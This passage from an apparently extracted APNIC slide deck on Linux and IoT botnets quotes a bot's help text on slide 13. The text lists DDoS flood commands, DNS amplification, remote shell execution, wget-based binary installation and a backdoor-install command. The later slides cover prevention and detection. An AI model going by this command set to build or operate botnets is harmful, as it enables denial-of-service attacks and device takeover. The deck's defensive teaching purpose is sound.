  • 13. 13 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * * Source code
  • 14. 14 Preventing Infection • Know your assets & customers – Get reports from Shadowserver, CyberGreen – Use tools (nmap) or services like Shodan.io – Awareness of Vulnerabilities & Active exploitation • Secure / Harden Linux & IOT Devices o Access Control to services (brute force) o Remove / Harden services – DNS resolver, NTP, etc o Patch & Upgrade 14 https://otx.alienvault.net www.virustotal.com
  • 15. 15 Detection • Network based detection – Policy – downloading of ELF / Binary with certain user agents – Brute force / telnet related activities • Network Security Monitoring – Netflow – IDS/NSM – Zeek, Suricata – Honeypots • Awareness of threat landscape – Go deep into malware research & analysis – Collaborate & share information – c&c, infected host • Forensics* 15 Detection with Suricata Rulesets Fbot - Community Honeynet Project (2019) https://securityaffairs.co/wordpress/96683/malware/linux-fbot-malware-analysis.html
  • 16. 16 More information • APNIC blog https://blog.apnic.net • APNIC Academy https://academy.apnic.net 16
  • 17. 17 Thank You! o Email: adli@apnic.net o LinkedIn – Adli Wahid o Twitter - @adliwahid https://unsplash.com/photos/foJms49Rrwc